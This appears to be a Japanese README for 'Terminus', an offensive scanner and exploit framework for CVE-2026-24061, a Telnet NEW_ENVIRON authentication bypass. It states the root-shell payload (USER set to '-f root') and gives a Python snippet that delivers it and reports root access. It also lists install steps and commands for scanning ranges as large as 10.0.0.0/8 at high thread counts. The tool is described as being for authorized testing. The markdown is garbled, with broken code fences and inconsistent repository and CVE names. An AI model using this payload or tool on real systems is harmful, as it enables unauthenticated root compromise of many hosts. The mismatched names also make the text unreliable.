
AsyncIOスキャナー&エクスプロイトフレームワーク for CVE-2026-24061(Telnet NEW_ENVIRON 認証バイパス)。高並行ディスカバリ、パッシブフィンガープリンティング、および認可されたrootシェル昇格を特徴とします。
CVE-2026-24061 Telnet NEW_ENVIRON 認証バイパスおよび権限昇格脆弱性のためのセキュリティ解析エンジン。

Terminus は、CVE-2026-24061 の認定ペネトレーションテストおよび脆弱性評価のために設計されたプロフェッショナルなセキュリティ調査ツールです。この重大な脆弱性はレガシー Telnet デーモン実装に影響を与え、未認証のリモート攻撃者が認証をバイパスして root レベルのアクセスを取得することを可能にします。
CVE-2026-24061 は、RFC 1572 (Telnet 環境オプション) をサポートする Telnet サービスにおけるリモートコード実行脆弱性です。この脆弱性は、NEW_ENVIRON サブネゴシエーション中の USER 環境変数の不適切なサニタイズを悪用します:
USER=john → パスワードを要求USER=-f root → 認証をバイパスし、root シェルを付与影響:
影響を受けるサービス:
192.168.0.0/24、10.0.0.0/8)--verify): エクスプロイトの証明、uid=0 root アクセスを確認Terminus.handshake() - RFC 854 準拠のハンドシェイクTerminus.exploit() - CVE-2026-24061 ペイロード配信--exploit フラグが必要Terminus の中核は TerminusNegotiator クラスであり、プロトコル処理とエクスプロイトロジックの明確な分離を提供します:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### エンジン方式とスクリプト方式
**従来のスクリプト**(既存ツール):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
Terminusエンジン:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## インストール
### 必要条件
- **Python 3.10以上**
- **対応プラットフォーム:**
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux、Parrot OS、Ubuntu)
- ネイティブLinux (Kali、Parrot、Ubuntu、Debian)
- macOS (Python 3.10以上)
### クイックスタート (全プラットフォーム)
#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### 手動インストール(全プラットフォーム)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --version
telnetlib3 - AsyncIO Telnet プロトコル実装rich - ターミナル UI とフォーマット(Windows/Linux での ANSI サポート)pydantic - データ検証とモデルaiofiles - 非同期ファイル I/Ojinja2 - レポートテンプレートpyyaml - 設定管理pathlib - クロスプラットフォームのパス処理(組み込み)注記: すべての依存関係は純粋な Python であるか、クロスプラットフォーム対応のホイールを備えています。プラットフォーム固有のコンパイルは不要です。
コマンド入力を高速化するためのタブ補完を有効にします:
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc
_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression
テストしてみる:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.
---
## 使用方法
### スキャンモード
#### 単一ターゲットスキャン```bash
terminus scan -t 192.168.1.100
terminus scan -t 192.168.1.0/24
#### ファイルベースのバッチスキャン```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500
terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200
### 検出モード
#### パッシブ検出(デフォルト - 安全)```bash
terminus scan -t target.com --passive-only
terminus scan -t target.com --aggressive
#### アクティブ検証モード(エクスプロイトの実証)```bash
terminus scan -t 192.168.1.100 --verify
バージョンの確認:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db
**パッシブスキャン(デフォルト - 保守的なリスク評価):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323